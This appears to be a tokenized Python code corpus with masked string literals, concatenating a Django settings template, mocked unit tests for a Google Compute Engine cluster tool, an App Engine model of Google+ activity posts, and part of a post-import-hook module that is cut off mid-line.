<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> import re <EOL> from speech_rest import main <EOL> def test_main ( resource , capsys ) : <EOL> main ( resource ( '<STR_LIT>' ) ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert re . search ( r'<STR_LIT>' , out , re . DOTALL | re . I ) </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import unittest <EOL> import mock <EOL> import gce_cluster <EOL> from gce_cluster import GceCluster <EOL> class GceClusterTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def tearDown ( self ) : <EOL> mock . patch . stopall ( ) <EOL> def _SetUpMocksForClusterStart ( self ) : <EOL> """<STR_LIT>""" <EOL> mock_gce_api_class = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> mock_subprocess_call = mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:0> ) . start ( ) <EOL> mock_popen = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> mock_popen . return_value . returncode = None <EOL> mock_popen . return_value . poll . return_value = <NUM_LIT:0> <EOL> mock_builtin_open = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> mock_sleep = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> parent_mock = mock . MagicMock ( ) <EOL> parent_mock . attach_mock ( mock_gce_api_class , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . CreateInstance , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . GetInstance , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . CreateDisk , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . GetDisk , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_subprocess_call , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_popen , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_popen . return_value . poll , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_builtin_open , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_sleep , '<STR_LIT>' ) <EOL> mock_gce_api_class . return_value . GetInstance . return_value = { <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ] , <EOL> } ] , <EOL> } <EOL> mock_gce_api_class . return_value . GetDisk . side_effect = [ <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> ] <EOL> return parent_mock <EOL> def testEnvironmentSetUp_Success ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:0> ) as mock_subprocess_call : <EOL> GceCluster ( <EOL> argparse . Namespace ( project = '<STR_LIT>' , <EOL> bucket = '<STR_LIT>' ) ) . EnvironmentSetUp ( ) <EOL> mock_subprocess_call . assert_called_once_with ( mock . ANY , shell = True ) <EOL> self . assertRegexpMatches ( <EOL> mock_subprocess_call . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' ) <EOL> def testEnvironmentSetUp_Error ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:1> ) as mock_subprocess_call : <EOL> self . assertRaises ( <EOL> gce_cluster . EnvironmentSetUpError , <EOL> GceCluster ( <EOL> argparse . Namespace ( project = '<STR_LIT>' , bucket = '<STR_LIT>' ) <EOL> ) . EnvironmentSetUp ) <EOL> mock_subprocess_call . assert_called_once_with ( mock . ANY , shell = True ) <EOL> self . assertRegexpMatches ( <EOL> mock_subprocess_call . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' ) <EOL> def testStartCluster ( self ) : <EOL> """<STR_LIT>""" <EOL> parent_mock = self . _SetUpMocksForClusterStart ( ) <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , <EOL> machinetype = '<STR_LIT>' , image = '<STR_LIT>' , zone = '<STR_LIT>' , num_workers = <NUM_LIT:2> , <EOL> command = '<STR_LIT>' , external_ip = '<STR_LIT:all>' ) ) . StartCluster ( ) <EOL> method_calls = parent_mock . method_calls . __iter__ ( ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertRaises ( StopIteration , method_calls . next ) <EOL> def testStartCluster_NoExternalIp ( self ) : <EOL> """<STR_LIT>""" <EOL> parent_mock = self . _SetUpMocksForClusterStart ( ) <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , <EOL> machinetype = '<STR_LIT>' , image = '<STR_LIT>' , zone = '<STR_LIT>' , num_workers = <NUM_LIT:2> , <EOL> command = '<STR_LIT>' , external_ip = '<STR_LIT>' ) ) . StartCluster ( ) <EOL> call = parent_mock . method_calls [ <NUM_LIT:10> ] <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = parent_mock . method_calls [ <NUM_LIT> ] <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = parent_mock . method_calls [ <NUM_LIT> ] <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> def testStartCluster_InstanceStatusError ( self ) : <EOL> """<STR_LIT>""" <EOL> parent_mock = self . _SetUpMocksForClusterStart ( ) <EOL> parent_mock . GceApi . return_value . GetInstance . return_value = { <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> } <EOL> self . assertRaises ( <EOL> gce_cluster . ClusterSetUpError , <EOL> gce_cluster . GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , <EOL> machinetype = '<STR_LIT>' , image = '<STR_LIT>' , zone = '<STR_LIT>' , num_workers = <NUM_LIT:2> , <EOL> command = '<STR_LIT>' , external_ip = '<STR_LIT:all>' ) ) . StartCluster ) <EOL> self . assertLessEqual ( <NUM_LIT> , parent_mock . GetInstance . call_count ) <EOL> self . assertLessEqual ( <NUM_LIT> , parent_mock . sleep . call_count ) <EOL> def testTeardownCluster ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' ) as mock_gce_api_class : <EOL> mock_gce_api_class . return_value . ListInstances . side_effect = [ <EOL> [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . ListDisks . side_effect = [ <EOL> [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . GetInstance . return_value = None <EOL> mock_gce_api_class . return_value . GetDisk . return_value = None <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , zone = '<STR_LIT>' ) ) . TeardownCluster ( ) <EOL> mock_gce_api_class . assert_called_once_with ( <EOL> '<STR_LIT>' , mock . ANY , mock . ANY , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> ( mock_gce_api_class . return_value . ListInstances . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> ( mock_gce_api_class . return_value . ListDisks . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) , mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteInstance . call_args_list ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) , mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteDisk . call_args_list ) <EOL> def testTeardownCluster_WithPrefix ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' ) as mock_gce_api_class : <EOL> mock_gce_api_class . return_value . ListInstances . side_effect = [ <EOL> [ { '<STR_LIT:name>' : '<STR_LIT>' } ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . ListDisks . side_effect = [ <EOL> [ { '<STR_LIT:name>' : '<STR_LIT>' } ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . GetInstance . return_value = None <EOL> mock_gce_api_class . return_value . GetDisk . return_value = None <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , zone = '<STR_LIT>' , <EOL> prefix = '<STR_LIT>' ) ) . TeardownCluster ( ) <EOL> mock_gce_api_class . assert_called_once_with ( <EOL> '<STR_LIT>' , mock . ANY , mock . ANY , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> ( mock_gce_api_class . return_value . ListInstances . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> ( mock_gce_api_class . return_value . ListDisks . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteInstance . call_args_list ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteDisk . call_args_list ) <EOL> def testTeardownCluster_NoInstance ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' ) as mock_gce_api_class : <EOL> mock_gce_api_class . return_value . ListInstances . return_value = [ ] <EOL> mock_gce_api_class . return_value . ListDisks . return_value = [ ] <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , zone = '<STR_LIT>' ) ) . TeardownCluster ( ) <EOL> mock_gce_api_class . assert_called_once_with ( <EOL> '<STR_LIT>' , mock . ANY , mock . ANY , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> ( mock_gce_api_class . return_value . ListInstances . <EOL> assert_called_once_with ( '<STR_LIT>' ) ) <EOL> ( mock_gce_api_class . return_value . ListDisks . <EOL> assert_called_once_with ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( <EOL> mock_gce_api_class . return_value . DeleteInstance . called ) <EOL> self . assertFalse ( <EOL> mock_gce_api_class . return_value . DeleteDisk . called ) <EOL> def testStartMapReduce ( self ) : <EOL> """<STR_LIT>""" <EOL> mock_subprocess_call = mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:0> ) . start ( ) <EOL> mock . patch ( '<STR_LIT>' , <EOL> side_effect = lambda x : '<STR_LIT>' + x ) . start ( ) <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , zone = '<STR_LIT>' , <EOL> input = '<STR_LIT>' , output = '<STR_LIT>' , <EOL> mapper = '<STR_LIT>' , reducer = '<STR_LIT>' , <EOL> mapper_count = <NUM_LIT:5> , reducer_count = <NUM_LIT:1> , <EOL> prefix = '<STR_LIT>' ) ) . StartMapReduce ( ) <EOL> self . assertEqual ( <NUM_LIT:4> , mock_subprocess_call . call_count ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:3> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import re <EOL> import logging <EOL> from google . appengine . ext import ndb <EOL> from endpoints_proto_datastore . ndb import EndpointsModel <EOL> from endpoints_proto_datastore . ndb import EndpointsAliasProperty <EOL> from endpoints_proto_datastore . ndb import EndpointsVariantIntegerProperty <EOL> from protorpc import messages <EOL> from models . activity_type import ActivityType <EOL> from models . product_group import ProductGroup <EOL> class ActivityPost ( EndpointsModel ) : <EOL> _message_fields_schema = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT:url>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> _api_key = None <EOL> post_id = ndb . StringProperty ( ) <EOL> gplus_id = ndb . StringProperty ( ) <EOL> name = ndb . StringProperty ( ) <EOL> date = ndb . StringProperty ( ) <EOL> plus_oners = EndpointsVariantIntegerProperty ( <EOL> variant = messages . Variant . INT32 ) <EOL> resharers = EndpointsVariantIntegerProperty ( variant = messages . Variant . INT32 ) <EOL> comments = EndpointsVariantIntegerProperty ( variant = messages . Variant . INT32 ) <EOL> title = ndb . StringProperty ( ) <EOL> url = ndb . StringProperty ( ) <EOL> product_group = ndb . StringProperty ( repeated = True ) <EOL> activity_type = ndb . StringProperty ( repeated = True ) <EOL> links = ndb . StringProperty ( ) <EOL> deleted = ndb . BooleanProperty ( default = False ) <EOL> def ApiKeySet ( self , value ) : <EOL> self . _api_key = value <EOL> @ EndpointsAliasProperty ( setter = ApiKeySet , property_type = messages . StringField ) <EOL> def api_key ( self ) : <EOL> return self . _api_key <EOL> def IdSet ( self , value ) : <EOL> if not isinstance ( value , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . UpdateFromKey ( ndb . Key ( ActivityPost , value ) ) <EOL> @ EndpointsAliasProperty ( setter = IdSet , required = True ) <EOL> def id ( self ) : <EOL> if self . key is not None : <EOL> return self . key . string_id ( ) <EOL> def create_from_gplus_post ( self , gplus_post ) : <EOL> self . post_id = gplus_post [ "<STR_LIT:id>" ] <EOL> self . name = gplus_post [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . gplus_id = gplus_post [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> self . date = gplus_post [ "<STR_LIT>" ] <EOL> self . url = gplus_post [ "<STR_LIT:url>" ] <EOL> self . title = gplus_post [ "<STR_LIT:title>" ] <EOL> self . plus_oners = gplus_post [ '<STR_LIT:object>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . resharers = gplus_post [ '<STR_LIT:object>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . comments = gplus_post [ '<STR_LIT:object>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> content = gplus_post [ "<STR_LIT:object>" ] [ "<STR_LIT:content>" ] <EOL> if '<STR_LIT>' in gplus_post : <EOL> content += '<STR_LIT:U+0020>' + gplus_post [ '<STR_LIT>' ] <EOL> self . activity_type = self . get_activity_types ( content ) <EOL> self . product_group = self . get_product_groups ( content ) <EOL> try : <EOL> attachments = gplus_post [ "<STR_LIT:object>" ] [ "<STR_LIT>" ] <EOL> except Exception as e : <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . links = "<STR_LIT>" <EOL> else : <EOL> attachment_links = self . get_links ( attachments ) <EOL> self . links = attachment_links <EOL> def get_activity_types ( self , content ) : <EOL> """<STR_LIT>""" <EOL> at = [ ] <EOL> for activity_type in ActivityType . all_tags ( ) : <EOL> result = re . search ( activity_type , content , flags = re . IGNORECASE ) <EOL> if result is not None : <EOL> at . append ( activity_type ) <EOL> return at <EOL> def get_product_groups ( self , content ) : <EOL> """<STR_LIT>""" <EOL> pg = [ ] <EOL> for product_group in ProductGroup . all_tags ( ) : <EOL> result = re . search ( product_group , content , flags = re . IGNORECASE ) <EOL> if result is not None : <EOL> pg . append ( product_group ) <EOL> return pg <EOL> def get_links ( self , attachments ) : <EOL> """<STR_LIT>""" <EOL> links = "<STR_LIT>" <EOL> for attachment in attachments : <EOL> if attachment [ "<STR_LIT>" ] == "<STR_LIT>" or attachment [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> if links != "<STR_LIT>" : <EOL> links += "<STR_LIT:U+002CU+0020>" <EOL> links += attachment [ "<STR_LIT:url>" ] <EOL> return links </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import threading <EOL> PY2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> PY3 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> if PY3 : <EOL> import importlib <EOL> string_types = str , <EOL> else : <EOL> string_types = basestring , <EOL> from . decorators import synchronized <EOL> _post_import_hooks = { } <EOL> _post_import_hooks_init = False <EOL> _post_import_hooks_lock = threading . RLock ( ) <EOL> def _create_import_hook_from_string ( name ) : <EOL> def import_hook ( module ) : <EOL> module_name , function = name . split ( '<STR_LIT::>' ) <EOL> attrs = function . split ( '<STR_LIT:.>' ) <EOL> __import__ ( module_name ) <EOL> callback = sys . modules [ module_name ] <EOL> for attr in attrs : <EOL> callback = getattr ( callback , attr ) <EOL> return callback ( module ) <EOL> return import_hook <EOL> @ synchronized ( _post_import_hooks_lock ) <EOL> def register_post_import_hook ( hook , name ) : <EOL> if isinstance ( hook , string_types ) : <EOL> hook = _create_import_hook_from_string ( hook ) <EOL> global _post_import_hooks_init <EOL> if not _post_import_hooks_init : <EOL> _post_import_hooks_init = True <EOL> sys . meta_path . insert ( <NUM_LIT:0> , ImportHookFinder ( ) ) <EOL> hooks = _post_import_hooks . get ( name , None ) <EOL> if hooks is None : <EOL> module = sys . modules . get ( name , None ) <EOL> if module is not None : <EOL> _post_import_hooks [ name ] = [ ] <EOL> hook ( module ) <EOL> else : <EOL> _post_import_hooks [ name ] = [ hook ] <EOL> elif hooks == [ ] : <EOL> module = sys . modules [ name ] <EOL> hook ( module ) <EOL> else : <EOL> _post_import_hooks [ name ] . append ( hook ) <EOL> def _create_import_hook_from_entrypoint ( entrypoint ) : <EOL> def import_hook ( module ) : <EOL> __import__ ( entrypoint . module_name ) <EOL> callback = sys . modules [ entrypoint . module_name ] <EOL> for attr in entrypoint . attrs : <EOL> callback = getattr ( callback , attr ) <EOL> return callback ( module ) <EOL> return import_hook <EOL> def discover_post_import_hooks ( group ) : <EOL> try : <EOL> import pkg_resources <EOL> except ImportError : <EOL> return <EOL> for entrypoint in pkg_resources . iter_entry_points ( group = group ) : <EOL> callback = _create_import_hook_from_entrypoint ( entrypoint ) <EOL> register_post_import_hook ( callback , entrypoint . name ) <EOL> @ synchronized ( _post_import_hooks_lock ) <EOL> def notify_module_loaded ( module ) : <EOL> name = getattr 